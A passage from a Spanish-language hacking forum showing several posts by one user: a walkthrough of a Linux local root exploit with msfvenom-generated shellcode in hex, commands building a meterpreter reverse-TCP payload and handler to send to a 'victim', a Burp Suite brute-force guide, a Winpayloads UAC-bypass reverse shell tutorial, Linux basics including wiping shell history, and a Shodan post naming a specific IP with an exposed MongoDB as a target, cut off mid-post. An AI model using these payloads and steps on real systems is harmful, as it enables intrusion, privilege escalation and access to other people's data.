Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BrowserNet

#41


Hace aproximadamente un mes, la comunidad linuxera (incluyéndome) se entero de una noticia que simplemente no se podría creer, un fallo de hace 9 años nuevamente estaba presente exponiendo un gran agujero de seguridad en las versiones: Ubuntu 14.04 y Ubuntu 15.10.

las consecuencias que con lleva son catastróficas, permite al atacante obtener privilegios root por medio de dicho una explotacion local, exponiendo todo el sistema de la victima sin ninguna excepción.

el bug también afecta a todos los dispositivos android de la versión 7 para abajo.

Elevando privilegios de usuario a root en Ubuntu 15.10



Exploit:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo primero que debemos hacer ver la fuente del archivo en 40616.c, lo puede hacer en cualquier editor de texto, en mi caso lo abrí por Sublime Text, para que puedan ver lo principal. 



Vemos que el exploit esta generado en msfvenom quiere decir que es un payload.

Este exploit funciona de la siguiente manera, notaron que hay 2 payloads de 64 y 32 bits, por default el de 64bits esta sin comentarios cabe decir que funcionara solamente para esa arquitectura, ya que el de 32 bits esta comentado y no ejercerá ninguna función.


64bits
Código: php

/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
  0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;


32bits

Código: php

/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/


En esta prueba de concepto, estoy exponiendo un sistema "UBUNTU 32BITS", cabe decir que eliminare el payload de 64 bits con todos sus atributos, para quedarme solamente con la arquitectura de 32bits:



ojo: también eh eliminado los comentarios del payloads de 32 bits.

luego de guárdalo pasaremos a compilar el archivo .c

Código: php
root@kali:~# gcc 40616.c -o 40616 -pthread 




Una ves compilado correctamente, podemos subirlo al servidor de la victima creo que no hay necesidad de pasar a ese proceso ya que existen muchas maneras de hacerlo, si no sabes te invito a buscar los artículos de metasploit framework, en el blog.



Ustedes pueden crear su payload en formato linux, ya que deben hacerlo para poder ejecutar formatos compilados con permisos.



Creando payload en linux 32bits

Código: php

root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.35 LPORT=8081 -f elf > /root/Desktop/shell.elf




Estableciendo conexión meterpreter

Código: php
msf > use multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.35
msf exploit(handler) > set LPORT 8081
msf exploit(handler) > exploit




Entonces le enviaremos nuestro payload a nuestra victima, en el momento que la victima ejecute tendremos su sesión meterpreter:



entramos a terminal y ejecutamos el "Exploit", vemos que se ejecuto correctamente, hemos escalado los privilegios root y por ende tenemos todos los permisos.

Siempre es bueno enseñar pruebas de todo, ejecutaremos el exploit en la misma maquina con un usuario llamado prueba:

./40616



El exploit funciono correctamente, esto fue todo estimados lectores espero les halla encantado este post.
#42
Hacking / Elaborando un ataque Brute Force en BurpSuite
Diciembre 03, 2016, 08:44:34 PM


Saludos nuevamente hermanos de underc0de en esta oportunidad les enseñare a elaborar un ataque de fuerza bruta en plataformas web, con Burpsuiete.

Burpsuite es una herramienta creada en java, que tiene como objetivo fundamental auditar cualquier plataforma web, capturando los datos que se envíen para posteriormente ejecutar ataques.

Si deseas aprender a utilizar esta herramienta puedes visitar el siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Elaborar un MITM:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Utilizar Burpsuite con Tor
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

antes de empezar les recomiendo que lean el primer post para que vayan configurando el proxy de Burpsuite en su navegador.

Plataforma para el ataque




como vemos esta plataforma es la escogí para elaborar la prueba de concepto, bueno ya hecho todo lo anteriormente mencionado, añadiremos cualquier credencial, lo importante es darle clip al botón y capturar los datos.



Luego de hacer todo lo siguiente, nos iremos al Burpsuite para ver lo capturado.



vemos que nos arrojo las respuesta que hemos enviado, lo que nosotros unicamente nos importa es la ultima linea:

usuario=admin&contra=123456

esta fue la credencial sin validez que añadí, entonces señalaremos todo el texto, le daremos anticlip y escogeremos la opción "Send Intruder" y nos dirigiremos a la pestaña "Positions":



vemos que se marcan 3 lineas una de Cookie y las de abajo de las credenciales, en nuestro caso nosotros debemos quedarnos con las lineas:

usuario=§admin§&contra=§123456§

para ello pueden señalar toda la linea cookie y darle en "Clear $", o simplemente darle "Clear $" sin señalar nada eliminando todo los payloads escogidos por default y señal solamente los parámetros usuario y contra.

si notaron bien en la anterior imagen en la barra de "Attack Type", esta en Sniper, nosotros la cambiaremos por "Cluster Bomb".



debe quedar de la siguiente manera luego de ello entraremos a la pestaña "Payloads"


Deseo aclarar lo siguiente en la barra Payload set, Se activaran la cantidad de payloads escogidos en pestaña "Positions" en nuestro caso fueron "2".

Aquí viene nuestra arma principal nuestro "Diccionario"
le daremos en el boton de abajo donde dice "load" y cargaremos nuestro diccionario.

el primer payload fue "usuario" >> user.txt



El segundo payload fue "contra" >> pass.txt



El proceso se debe repetir para ambos, ya que son payloads diferentes, luego de ello le daremos en el botón "Start attack".

entonces se empezara nuestro ataque de fuerza bruta.



Vemos que estamos elaborando el ataque  y tenemos respuestas "200", que en su mayoría son peticiones comunes estáticas de un modelo.

pero si observamos la linea señalada esta con respuesta "302", significa que hemos entrado a un modelo diferente de donde hemos estado, en ciertas palabras conectándonos al panel administrativo.

Credencial correcta:

usuario=admin&contra=jacky

HTTP/1.1 302 Found
Date: Mon, 14 Nov 2016 01:33:19 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.5.38
X-Powered-By: PHP/5.5.38
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: admin/Administrador.php
Content-Length: 3884
Connection: close
Content-Type: text/html




Esto fue todo amigos, no olviden compartir la pagina y dejar su comentario.
agradecer no cuesta nada.

Saludos!!
#43


Saludos mis fieles lectores en esta oportunidad, a pedidos de algunos seguidores de la fan page, enseñare a como crear tu laboratorio virtual desde tu sistema, cabe decir que los complementos utilizados en este escenario están disponibles para cualquier sistema operativo.


Para cualquier investigador de seguridad la mejor manera de auditar una plataforma es que este alojada en su propio laboratorio de pruebas por excelencia.


Emular sistemas operativos:


En este primer escenario sin duda es uno de los mas importantes en la rama de la seguridad informática, ya que se enfoca principalmente en sistemas públicos y privados, para encontrar fallas que afecten la privacidad de millones de usuarios y a su vez contengan puertas traseras (Backdoors).

Vulnerabilidades como el Shellshock, hasta el ultimo encontrado denominado Dirty COW se han encontrado en laboratorios virtuales por investigadores independientes.

Herramientas de emulación de sistemas operativos:

Vmware



Es una filial de EMC Corporation (propiedad a su vez de Dell Inc) que proporciona software de virtualización disponible para ordenadores compatibles X86. Entre este software se incluyen VMware Workstation, y los gratuitos VMware Server y VMware Player. El software de VMware puede funcionar en Windows, Linux, y en la plataforma mac OS que corre en procesadores Intel, bajo el nombre de VMware Fusion


Referencia:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pagina de descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Virtualbox



Oracle VM VirtualBox es un software de virtualización para arquitecturas x86/amd64, creado originalmente por la empresa alemana innotek GmbH.

Referencia:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pagina de descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Estos 2 emuladores mencionados son los mejores y mas utilizados a nivel mundial, puedes emular cualquier sistema operativo.



Sistemas operativos recomendados:


Microsoft Windows

    Windows XP
    Windows 7
    Windows 8
    Windows 10

GNU/Linux

    Ubunto
    Debian
    ArchLinux

Mac OS
      Mac OS X Yosemit

Android

      Android 6.0 Marshmallow



Todos los sistemas mencionados los pueden descargar en archivo de imagen .ISO en sus paginas oficiales.

Si deseas explotar algunos fallos encontrados les recomiendo utilizas versiones "Antiguas", y empezar a testar.



Por el momento estos distros los tengo corriendo para mis pruebas de Testing.

Distros vulnerables para pruebas de Penetration Pestesting:


Existen pequeñas organizaciones que han diseñado sus propios sistemas vulnerables una de ellas es For Pentester y Owasp.

Si desean descargar cualquier distro con fallas conocidas corriendo en dicho sistema no dudes en visitar la pagina:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pero sin duda una de las usadas hasta el momento es metasploitable



Metasploitable es una máquina virtual Linux intencionadamente vulnerables. Esta máquina virtual se puede utilizar para llevar a cabo la formación en seguridad, herramientas de seguridad de prueba, y practicar técnicas de pruebas de penetración común.

Referencia:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Auditar plataformas Web

El mundo del internet avanza demasiado tecnológicamente hablando, desde que se crearon plataformas web se optimizaron varios procesos que en la vida cotidiana eran muy molestos como por ejemplo depositar dinero en una cuenta, teníamos que hacer horas de cola, pero ahora no es así desde tu dispositivo móvil o tu ordenador puedes hacer eso en menos de 5 segundos por medio de una plataforma web de tu banca online.

La gran pregunta es: ¿Mis datos son seguros? ¿alguien puede obtener mis credenciales? ¿Hackearon la pagina del banco?

Pues si, estas preguntas son las mas frecuentes que cualquier usuario se preguntaría, entonces viene el gran reto de un investigador de seguridad.

"Reportar fallos que perjudican a los usuarios a nivel mundial y mejorar la seguridad informática día a día".

CMS -  Sistemas de gestión de contenidos


Los CMS o Sistemas de gestión de contenidos son plataformas dedicadas especialmente para crear estructuras de soporte y administración de contenidos, principalmente en paginas web.

Existen varias plataformas las mas conocidas son.

Joomla, Wordpress, Drupal, etc.


Como bien sabemos existen varias vulnerabilidades en Plugins y complementos de los mencionados "CMS", ustedes pueden verificar en esta pagina dedicada a Exploits en todo tipo de plataformas:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

digamos que para un investigador de seguridad web es fundamental tener algunos de estos gestores en su localhost para investigar posibles fallos y encontrar algunos 0days.

Descargar Plugins Joomla:



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descargar Plugins Wordpress:



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Joomla



Joomla es un sistema de gestión de contenidos (o CMS, por las siglas en inglés, Content Management System) que permite desarrollar sitios web dinámicos e interactivos. Permite crear, modificar o eliminar contenido de un sitio web de manera sencilla a través de un "panel de administración". Es un software de código abierto, programado o desarrollado en PHP y liberado bajo Licencia pública general GNU (GPL).

Referencia:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
Pagina de descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Wodpress:



WordPress es un sistema de gestión de contenidos o CMS (por sus siglas en inglés, Content Management System) enfocado a la creación de cualquier tipo de sitio. Originalmente alcanzó una gran relevancia usado para la creación de blogs, para convertirse con el tiempo en una de las principales herramientas para la creación de páginas web comerciales.

Referencia:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pagina de descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pentesting en plataformas Web

Existen aplicaciones vulnerables web desarrolladas para realizar pruebas de Pentesting, en su mayoría la organización Owasp ha desarrollado buenos ejemplares, como también grupos independientes.

bWAPP



bWAPP, o una aplicación web con errores, es una fuente libre y abierto deliberadamente aplicación web insegura.
Ayuda a entusiastas de la seguridad, los desarrolladores y los estudiantes para descubrir y para prevenir vulnerabilidades web.
bWAPP lo prepara a uno para realizar pruebas de penetración exitosa y proyectos de hacking ético.

Lo que hace tan único bWAPP? Bueno, tiene más de 100 vulnerabilidades web!
Cubre todas las principales web bugs conocidos, incluyendo todos los riesgos del proyecto OWASP Top 10.

Referencia:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Damn Vulnerable Web Application



Es una aplicación web PHP / MySQL que es maldita vulnerables. Su objetivo principal es ser una ayuda para los profesionales de la seguridad para poner a prueba sus habilidades y herramientas en un entorno jurídico, ayudar a los desarrolladores web a comprender mejor los procesos de asegurar las aplicaciones web y para ayudar tanto a los estudiantes y profesores para aprender acerca de la seguridad de aplicaciones web en una clase controlada ambiente de la sala.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

SQLi-Labs avanzado



SQLI-LABS es una plataforma para aprender SQLI Siguiendo laboratorios que están cubiertos para parametros GET y POST.

los escenarios son los siguientes:

        Error Based Injections (Union Select)
        String
        Intiger
        Error Based Injections (Double Injection Based)
        BLIND Injections: 1.Boolian Based 2.Time Based
        Update Query Injection.
        Insert Query Injections.
        Header Injections. 1.Referer based. 2.UserAgent based. 3.Cookie based.
        Second Order Injections
        Bypassing WAF
        Bypassing Blacklist filters Stripping comments Stripping OR & AND    Stripping SPACES and COMMENTS Stripping UNION & SELECT
        Impidence mismatch
        Bypass addslashes()
        Bypassing mysql_real_escape_string. (under special conditions)
        Stacked SQL injections.
        Secondary channel extraction

Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En mi caso, con las plataformas mencionadas doy mis clases y charlas de seguridad informática y te los recomiendo mucho.

como lo dijo un grande de seguridad Informática, el gran chema alonso:

" Leer, Practicar y ser constante. "


Dejare su vídeo dando algunos consejos para empezar en el mundo de la seguridad informática & Hacking.



Saludos y éxitos para todos, no olvides compartir el blog y dejar un comentario.
agradecer no cuesta nada, Saludos.
#44


Saludos hermanos de underc0de, hoy es mi full day de post's xD,  en esta oportunidad les traigo una herramienta llamada "WInPayloads" creada en python, su función principal es crear "Payloads" unicamente para la plataforma Windows, su uso es sencillo como un framework lo interesante de ello, es su constante actualización y las nuevas funciones que se añaden en cada repertorio.

Descarga:

Código: php
root@kali:~/Winpayloads# git clone https://github.com/nccgroup/Winpayloads.git 


Luego de descargar su respectivo modulo, pasaremos a entrar a la carpeta e instalaremos los requisitos y dependencias necesarias.

Código: php
root@kali:~/Winpayloads# ./setup.sh




Bueno ya instalado todo lo necesario, pasaremos a ejecutar el archivo.



lo peculiar de esta herramienta es que todo esta automatizado, cabe decir que es una herramienta para personas ocupadas como nosotros y deseemos optimizar los procesos.

en esta prueba de concepto escogeré la opción 2:

2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks]

configurando nuestro payload




vemos que nos aparecen 2 lineas que nos pregunta que puerto de escucha y IP deseamos añadir, en si las opciones te llegan configuradas, pero si deseas añadir tu puerto de escucha puedes personalizarlo, como también añadir tu  IP publica para ataques fuera de la red (WAN)
 
En mi caso escogí el puerto 8081 y deje mi IP por default para estatblecer nuestros datos de conexión en nuestro payload.   

Luego de configurar esos datos, nos aparecerá la penúltima linea:

  • Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y[/color]

    No hay necesidad de explicar lo siguiente, porque esta bien claro, nos pregunta si deseamos utilizar un exploit Bypass UAC para obtener todos los privilegios, yo le añadí que si.

    • Payload.exe Has Been Generated And Is Located Here: /etc/winpayloads/Windows_Meterpreter_Reverse_Shell.exe
      [/color]
      El archivo se genero en la carpeta de raiz:  /etc/winpayloads

      Para terminar nos aparece la siguiente linea:

      Upload To Local Websever or (p)sexec? [y]/p/n: y

      lo pregunta es, si deseamos crear un servidor web local de escucha para subir nuestro payloads y poder enviarlo a nuestro victima, yo le añadí si.

      Serving Payload On No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


      Vemos que nos arrojo la ruta del payload corriendo, luego de ello se abrirá metasploit framework con nuestra configuración añadida:



      Solo nos quedara enviar el payloads a nuestra victima pueden utilizar MITM, si estas en tu red local o cualquier otro medio, si no sabes como te invito a buscar en el blog los artículos mencionados.



      Luego que nuestra victima ejecute el exploit: ojo ustedes pueden cambiarle el nombre, aclaro esto porque tengo un "critico" con micronocimientos que comenta a cada momento un post mio, jajaja.

      Bueno en el momento que nuestra victima ejecute el payloads tendremos su sesión meterpreter 1, pero en segundo plano se estará ejecutando el modulo del Bypass UAC:



      vemos que nuestro bypass se ejecuto correctamente, espero les halla gustado este pequeño articulo.
      Saludos
#45


Saludos mis queridos hermanos de underc0de, ahora si estoy de vacaciones jajaja, en esta oportunidad haré un POST profundo para que aprendan a utilizar el sistema GNU/Linux, a pedido de muchos seguidores del blog que me han estado dejando mensajes privados, coordinadamente atenderé sus necesidades porque gracias a cada uno de ustedes, soy lo que soy en estos momentos, sin mas que decir vamos a explicar un poco la historia del Software Libre.



El software libre es una ideología que surgió en los años 80, su ideología única es respetar la libertar del usuario, luchando contra la venta y utilización del software privativo, impulsada por el padre del software libre Richard Stallman creando una comunidad social de solidaridad que han revolucionado la historia de la informática como la conocemos, desde ese punto de ideología tenemos los famosos lenguajes de programación "Open Source" y algo completamente importante para usuarios como yo, el sistema "UNIX" que es el S.O primitivo creado por Linux Torvalds, que en ese entonces fue un sistema comercial.

posteriormente paso a llamarse "GNU" por la implementación del kernel del sistema UNIX de Torvalds al sistema operativo de los desarrolladores de software libre teniendo como líder a Richard Stallman,  para que GNU pueda funcionar de una manera correcta y pasar desde entonces como "EL SISTEMA LIBRE" que revoluciono las medidas de seguridad y el manejo de libertar del usuario.

Richard Stallman es una revolucionario informático, que actualmente lucha contra grandes gobiernos y empresas como Microsoft que nos privan de nuestra privacidad, como a su vez tratan de añadirnos puertas traseras a nuestros sistemas para poder expiarnos.



Esta es la frase célebre del padre del software que por mi parte me encanto:

"¿Por qué quiere regalar Microsoft copias casi gratuitas (de su programa) a escuelas y niños?, es como regalar drogas adictivas, ya que la primera dosis es gratis pero, después de ser dependiente, tienes que pagar."

Existen 4 libertades  que se deben cumplir:



  • Libertad 0. Libertad de ejecutar el programa como desees.


  •     Libertad 1. Libertad de estudiar el código fuente del programa y realizar los cambios que desee el programador.


  • Libertad 2. Libertad de ayudar a tu programa. Crear copias exactas del programa y distribuirlas bien gratuitamente o con la libertad de vender tu desarrollo. Estas dos opciones están permitidas por la comunidad.


  • Libertad 3. Libertad para contribuir a tu Comunidad. Hacer copias de tus versiones modificadas y distribuirlas entre los demás.



Antes de comenzar a dar tus primeros pasos en GNU, te recomiendo emularlo en tu sistema nativo por el momento, te sugiero utilizar ubuntu, Debian por que plataforma es bastante útil y sencilla.

Los pueden descargar en sus paginas oficiales:

Ubuntu:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Debian:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Comandos de navegación:


cd     - Entrar a una carpeta.
cd ..  - Salir de carpeta y volver a un directorio anterior.
cd /   - Dirigirse a la carpeta raíz del sistema. 
ls      - Ver todos archivos & directorios.
ls -la - Ver todos archivos & directorios(ocultos) con sus respectivos permisos.




Comandos de manipulación de datos:

mkdir - permite crear una carpeta.
rm -f   - permite eliminar un archivo.
rm -r  - permite eliminar un directorio.




touch - permite crear un archivo 




Aprendamos un poco sobre los permisos:

En GNU, la gestión de permisos de usuarios y los grupos de usuarios tienen sus carpetas y archivos, se realizan con los siguientes tipos de permisos.

    Permiso de Lectura
    Permiso de Escritura
    Permiso de Ejecución


permiso de lectura se representa con la letra r que en ingles es "Read" - "Leer".

permiso de Escritura se representa con la letra w que en ingles es "Write" - Escritura.

permiso de ejecución se representa con la letra x que en ingles es "Execute" - Ejecución.

Código: php
root@kali:~/tutorial# chmod 664 * byass.txt



Propietario: lectura y escritura
Grupo: lectura
Resto: lectura

Código: php
root@kali:~/tutorial# chmod 775 * login.txt


Propietario: lectura, escritura y ejecución
Grupo: lectura y ejecución
Resto: lectura y ejecución


Código: php
root@kali:~/tutorial# chmod 777 * password.txt


Propietario: lectura, escritura y ejecución
Grupo: lectura, escritura y ejecución
Resto: lectura, escritura y ejecución



Si desean verlo con profundidad pueden ver el siguiente articulo aquí
otra cosa muy importante si es que una carpeta o un archivo necesite permisos administrativos para abrirse y tu eres root, debes ejecutar el comando sudo para poder leerlo, abrirlo o ejecutarlo.

Código: php
root@kali:~/# sudo nano abrirme.log


Instalar herramientas:

En GNU hay 3 formas de instalar una herramienta una de ellas es de forma gráfica con archivos run, "ejecutables" en entorno GUI.



Existen 2 formas de instalar por la terminal, uno que con lleva a instalaciones por repertorios y la otra por archivo .deb formado de paquetes.

Instalar por "APT"
Código: php

root@kali:~# apt-get install iceweasel




¿Muy sencillo verdad?.

Explicare algo bien resumido, el navegador iceweasel se instalado por el simple hecho que se encuentra añadido en nuestro repositorio, si nosotros instalamos una herramienta como virtualbox, etc no lo reconocerá porque no esta añadido:

Código: php
root@kali:~# nano /etc/apt/sources.list 





en ese archivo podemos añadir repositorios nuevos, actualizar nuestro repertorio para poder instalar la herramienta nueva con:

Código: php
root@kali:~# apt-get update         
                   

Si deseas desintalarlo y eliminarlo de manera permanente junto con sus archivos lo puedes hacer de la siguiente manera:

Código: php
root@kali:~/# apt-get remove firefox  --purge



Ahora nos queda la ultima, podemos instalar también herramientas en forme paquetes, que no estén añadidos en algún repositorio, descargado su instalador como por ejemplo: ninja-ide
Código: php

root@kali:~/Downloads# dpkg -i ninja-ide_2.3+r597~saucy1_all.deb




bastante sencillo verdad, si deseas desintalarlo lo puedes hacer de la siguiente manera:

Código: php
root@kali:~/# dpkg -r ninja-ide


ahora imagínese que desee instalar una herramienta de 64bits y usted tiene de 32bits, puede hacerlo volviendo su sistema multiplataforma.

"multiarch" Multi-arquitectura.

Primero debe instalar para proceder a elaborar el multiarch

Código: php
root@kali:~# apt-get install dpkg


Para ver que arquitectura ponemos.
Código: php

root@kali:~# dpkg --print-foreign-architectures


Yo le quiero añadir la arquitectura amd64.
Código: php

root@kali:~# dpkg --add-architecture amd64


Si deseas instalar una herramienta con dicha arquitectura.
Código: php

root@kali:~# apt-get install wine:amd64


Si deseas eliminar alguna arquitectura:

Código: php
root@kali:~# dpkg --remove-architecture arquitectura


si deseas saber los datos de red, lo puedes hacer ejecutando:
Código: php

root@kali:~# ifconfig 




como vemos estoy utilizando eth0 red por cableado, si deseo activar o prender mi conexión inalámbrica - wlan0 lo puedes hacer ejecutando lo siguiente:

Código: php
root@kali:~# ifconfig  wlan0 up


Si deseas apagarlo lo puedes hacer de la siguiente manera:

Código: php
root@kali:~# ifconfig  wlan0 down 


muy sencillo verdad lo puedes hacer mediante wlan0 como eth0.

manipulación servicios

por ejemplo si nosotros trabajamos con un servicio como apache2 o servicios de base de datos como de red, debemos siempre activarlos para que puedan correr en nuestros sistemas.

Para activar nuestro servicio:

Código: php
root@kali:~# service apache2 start


Para ver el estado de nuestro servicio:

Código: php
root@kali:~# service apache2 status


Para detener nuestro servicio:

Código: php
root@kali:~# service apache2 stop




Optimizar nuestros procesos

Si bien sabemos en GNU no consumimos muchos recursos dependiendo de que procesos estamos corriendo en vivo, debemos saber que Linux trae su propio optimizador de procesos.


Primero veamos cuanta memoria se esta ejecutando en el sistema:

Código: php
root@kali:~# watch -n 1 free -m


si se fijan ustedes en su terminal, verán sus resultados entonces si nosotros deseamos optimizar los procesos que no se ejecutan de forma principal los podemos cerrar de la siguiente manera borrando los caches de la raw.

Código: php
root@kali:~# sync && sysctl -w vm.drop_caches=3


Una cosa importante cada ves que ejecuten comandos en la terminal - Shell, se registra todo.

Puedes ver todas esas lineas de la siguiente manera.

Código: php
root@kali:~# history




Si no te gustan tales lineas puedes eliminar todas de la siguiente manera:

Código: php
root@kali:~# cat /dev/null > ~/.bash_history


Digamos que solamente desea eliminar algunas lineas, por ejemplo la linea 1995 lo puedes hacer de esta manera:

Código: php
root@kali:~# history -d 1995 


Bueno mis estimados lectores con estos pasos que les eh enseñado los ayudara demasiado a comprender y poder navegar por la terminal de GNU sin ningún problema.

Nuevamente es un agrado cumplir con ustedes, son las 5:20 am y no eh dormido casi nada xD

Saludos y éxitos para todos, no olvides compartir el blog y dejar tu comentario.
Agradecer no cuesta nada.
#46
Pentesting / Pentesting con Shodan & Exploits funcionales
Noviembre 07, 2016, 12:14:00 AM


Saludos hermanos de underc0de luego de un largo tiempo de vacaciones nuevamente estoy retomando el foro, es un placer nuevamente servirles como lo eh estado asiendo, aparte vi que cerraron un post mio, con unos comentarios de lamerines que ni siquiera saben lo que es un Exploit / POST-EXPLOTACION. xD

Sin mas que decir, hoy tocaremos el tema sobre "SHODAN" en su modo Pentesting, utilizando Exploits funcionales que les ayudara  a comprender y auditar servidores vulnerables que existen.

Si deseas aprender lo basico de shodan puedes visitar el siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

en primer lugar antes de pasar con la metodología de explotación, tendremos un "Extra" con un gestor de base de datos "poco conocido por algunos", pero utilizados por servidores grandes & pequeños.

MONGODB:


MongoDB es un sistema de base de datos NoSQL orientado a documentos, desarrollado bajo el concepto de código abierto. MongoDB forma parte de la nueva familia de sistemas de base de datos NoSQL

fuente & más información:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

como sabemos MongoDB es un sistema de DB basado en el concepto Open source, pero porque tal gestor esta en este POST.


En su plataforma web, shodan tiene varias secciones donde podemos interactual con ellos, un claro ejemplo es "Databases":

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Podemos ver que nos muestra servicios conocidos tales como "MySQL" y "PostgreSQL" denominado (El Oracle OpenSource).

Entre otros el que utilizaremos en esta prueba de concepto "MongoDB",etc.

Ustedes poden darle "CLIP" al servicio mongoDB O simplemente utilizar su "DORK" para una búsqueda personalizada.

product:MongoDB



Podemos observar en la imagen solo nos muestra "2" resultados, que si lo leen bien tenemos lo que se le denomina "FUGA DE INFORMACIÓN".


¿Que es una fuga de información?


Son datos de información delicados o sensibles de un servicio privado que se muestra por motivos humanos o directorios mal protegidos, pero en su gran mayoria existen servicios que muestran tales datos como lo es MongoDB:


Target:
Código: php

173.208.176.236
Database Name Size
zakey 49.8 GB
local 2.1 MB
admin 1 byte

   

Tenemos: LA IP y las base de datos que nos arroja directamente, si bien sabemos que un servidor con credenciales no arroja mas halla que un panel de usuario, porque en esta busqueda nos arroja datos sensibles.

Es simple, porque al buscar el producto MongoDB, shodan empieza a recopilar la información de tal gestor de base de datos, que tiene una mala configuración de seguridad.

¿como podemos "Acceder" a los servicios vulnerables?

bueno es simple, si estas en GNU puedes instalar el servicio mongoDB de la siguiente manera:

Código: php
root@kali:~# apt-get install mongodb


una ves instalado, debemos activar el servicio de la siguiente manera:

Código: php
root@kali:~# service mongodb start


luego de activar el servicio, como puedes ver si esta activado pues es simple:

Código: php
root@kali:~# service mongodb status

   


como vemos en la imagen nuestro servicio esta activo, ahora como lo conectamos a nuestro victima.

En esta prueba de concepto nuestra victima sera:   

